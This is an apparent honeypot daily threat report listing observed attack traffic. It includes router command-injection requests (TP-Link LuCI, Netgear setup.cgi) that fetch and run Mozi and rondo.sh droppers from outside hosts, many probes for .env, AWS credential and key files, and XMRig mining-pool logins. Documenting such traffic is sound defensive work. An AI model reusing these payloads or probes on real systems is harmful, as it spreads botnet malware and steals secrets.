
Report: 2025-06-23

Category: Daily Report
Author: Shoggoth Industries
Daily Report: 2025-06-23

Executive summary

Interaction report on the HTTP service of various honeypots around the world.


In today's report, we detected 5 stage-1 IP addresses, linked to 4 dropper URLs.

There are 110 new requests that had never been observed before (these were added to the monitored request database).

A total of 775 requests were recorded during the day, originating from 5 different countries, with a peak of 225 requests coming from the US.

OT simplified report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| Source country | Targeted country |
|---|---|
| US | Dubai |

Botnet dropper behaviour

| Remote address | Request |
|---|---|
| 45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
| 103.93.93.162 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 117.209.26.140 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 139.5.11.123 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.11.123:34619/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O- |

New requests

The requests listed here are those that had not yet been integrated into the request database.

| Occurrences | Request |
|---|---|
| 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2248JsrSuzreCQUXw5qe1ajS8HotHoCrHVvX7c5tZLiBAc3JzYGSJkJQ8NxqRNkDurMrMAaM34NUBvLdNiF1TY9BVNSU7Gg75\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
| 1 | GET /.env.old HTTP/1.1 |
| 1 | GET /.env.www HTTP/1.1 |
| 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x33fa4f2917facff27ad2a4b29b1b9a5abcbbefd8\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
| 1 | GET /config/settings.ini HTTP/1.1 |
| 1 | GET /info HTTP/1.1 |
| 1 | GET /env.test.js HTTP/1.1 |
| 1 | GET /info.php HTTP/1.1 |
| 1 | GET /portal/.env HTTP/1.1 |
| 1 | GET /env/.env HTTP/1.1 |
| 1 | GET /dev/.env HTTP/1.1 |
| 1 | GET /admin/.env HTTP/1.1 |
| 1 | GET /application/.env HTTP/1.1 |
| 1 | GET /env.bak HTTP/1.1 |
| 1 | GET /phpinfo HTTP/1.1 |
| 1 | GET /_profiler/phpinfo HTTP/1.1 |
| 1 | GET /phpinfo.php HTTP/1.1 |
| 1 | GET /.env.bak HTTP/1.1 |
| 1 | GET /.env.backup HTTP/1.1 |
| 1 | GET /.env_sample HTTP/1.1 |
| 1 | GET /aws-secret.yaml HTTP/1.1 |
| 1 | GET /awstats/.env HTTP/1.1 |
| 1 | GET /conf/.env HTTP/1.1 |
| 1 | GET /cron/.env HTTP/1.1 |
| 1 | GET /www/.env HTTP/1.1 |
| 1 | GET /docker/.env HTTP/1.1 |
| 1 | GET /docker/app/.env HTTP/1.1 |
| 1 | GET /.env.production HTTP/1.1 |
| 1 | GET /.env.production.local HTTP/1.1 |
| 1 | GET /.env.prod HTTP/1.1 |
| 1 | GET /.env.test HTTP/1.1 |
| 1 | GET /.env.sample.php HTTP/1.1 |
| 1 | GET /.env.php HTTP/1.1 |
| 1 | GET /.env1 HTTP/1.1 |
| 1 | GET /.venv HTTP/1.1 |
| 1 | GET /env.prod.js HTTP/1.1 |
| 1 | GET /mailer/.env HTTP/1.1 |
| 1 | GET /nginx/.env HTTP/1.1 |
| 1 | GET /public/.env HTTP/1.1 |
| 1 | GET /site/.env HTTP/1.1 |
| 1 | GET /xampp/.env HTTP/1.1 |
| 1 | GET /.docker/laravel/app/.env HTTP/1.1 |
| 1 | GET /laravel/.env.local HTTP/1.1 |
| 1 | GET /new/.env HTTP/1.1 |
| 1 | GET /new/.env.local HTTP/1.1 |
| 1 | GET /new/.env.production HTTP/1.1 |
| 1 | GET /new/.env.staging HTTP/1.1 |
| 1 | GET /_phpinfo.php HTTP/1.1 |
| 1 | GET /_profiler/phpinfo/info.php HTTP/1.1 |
| 1 | GET /_profiler/phpinfo/phpinfo.php HTTP/1.1 |
| 1 | GET /wp-config HTTP/1.1 |
| 1 | GET /env.php HTTP/1.1 |
| 1 | GET /bootstrap/cache/config.php HTTP/1.1 |
| 1 | GET /storage/app/private/.env HTTP/1.1 |
| 1 | GET /storage/logs/laravel.log HTTP/1.1 |
| 1 | GET /composer.lock HTTP/1.1 |
| 1 | GET /server.key HTTP/1.1 |
| 1 | GET /dump.sh HTTP/1.1 |
| 1 | GET /php5.ini HTTP/1.1 |
| 1 | GET /env.backup HTTP/1.1 |
| 1 | GET /xampp/phpinfo.php HTTP/1.1 |
| 1 | GET /lara/info.php HTTP/1.1 |
| 1 | GET /lara/phpinfo.php HTTP/1.1 |
| 1 | GET /laravel/info.php HTTP/1.1 |
| 1 | GET /.vscode/.env HTTP/1.1 |
| 1 | GET /js/.env HTTP/1.1 |
| 1 | GET /laravel/core/.env HTTP/1.1 |
| 1 | GET /mail/.env HTTP/1.1 |
| 1 | GET /docker.sh HTTP/1.1 |
| 1 | GET /m2Pm HTTP/1.1 |
| 1 | GET /8nGp HTTP/1.1 |
| 1 | GET /laravel/.env.production HTTP/1.1 |
| 1 | GET /laravel/.env.staging HTTP/1.1 |
| 1 | GET /laravel/core/.env.local HTTP/1.1 |
| 1 | GET /laravel/core/.env.production HTTP/1.1 |
| 1 | GET /laravel/core/.env.staging HTTP/1.1 |
| 1 | GET /main/.env HTTP/1.1 |
| 1 | GET /.aws/credentials HTTP/1.1 |
| 1 | GET /config.php HTTP/1.1 |
| 1 | GET /sendgrid.json HTTP/1.1 |
| 1 | GET / HTTP/1.1 |
| 1 | GET /.env HTTP/1.1 |
| 1 | GET /.env_example HTTP/1.1 |
| 1 | GET /core/.env HTTP/1.1 |
| 1 | GET /app/.env HTTP/1.1 |
| 1 | GET /api HTTP/1.1 |
| 1 | GET /backend HTTP/1.1 |
| 1 | GET /env HTTP/1.1 |
| 1 | GET /laravel/.env HTTP/1.1 |
| 1 | GET /config.php.bak HTTP/1.1 |
| 1 | GET /src/app.js HTTP/1.1 |
| 1 | GET /server-info HTTP/1.1 |
| 1 | GET /.docker/.env HTTP/1.1 |
| 1 | GET /.env.dev HTTP/1.1 |
| 1 | GET /.env.example HTTP/1.1 |
| 1 | GET /config.env HTTP/1.1 |
| 1 | GET /.environment HTTP/1.1 |
| 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246KuG72PYf92S8EjkPASVkdM3d3Ue4Jwv25sRR4uFs7tFVid9aeGczJVtTtrnp9qu3fZceryhrNrtcyGFNMgR3JSLLXSV6y\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
| 1 | \x00\x0E\x08U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00 |
| 1 | \x00\x0E8U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00 |
| 1 | \x00\x0E\x08\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00 |
| 1 | \x00\x0E8\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00 |
| 1 | GET /web/.env HTTP/1.1 |
| 1 | GET /crm/.env HTTP/1.1 |
| 1 | GET /backend/.env HTTP/1.1 |
| 1 | GET /local/.env HTTP/1.1 |
| 1 | GET /api/.env HTTP/1.1 |
| 1 | \x00\x0E\x085C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00 |
| 1 | \x00\x0E85C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00 |
| 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x20ea1696e333d549e24a3c71964e59fe08bc7df0\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |

Source country

| Occurrences | Country (ISO code) |
|---|---|
| 225 | US |
| 168 | GB |
| 57 | NL |
| 45 | BG |
| 38 | DE |
| 32 | JP |
| 31 | ES |
| 27 | CN |
| 16 | SG |
| 14 | LT |
| 13 | CA |
| 10 | GH |
| 8 | CH |
| 8 | PL |
| 7 | BR |
| 6 | MD |
| 6 | HU |
| 6 | PT |
| 5 | UA |
| 5 | KR |
| 4 | TR |
| 4 | IR |
| 3 | NG |
| 3 | HK |
| 3 | IE |
| 3 | BE |
| 3 | KZ |
| 3 | FR |
| 3 | RU |
| 2 | IN |
| 2 | MC |
| 2 | MO |
| 2 | VN |
| 2 | SC |
| 2 | IL |
| 2 | ID |
| 1 | HN |
| 1 | CZ |
| 1 | ZA |
| 1 | CO |
| 1 | RO |
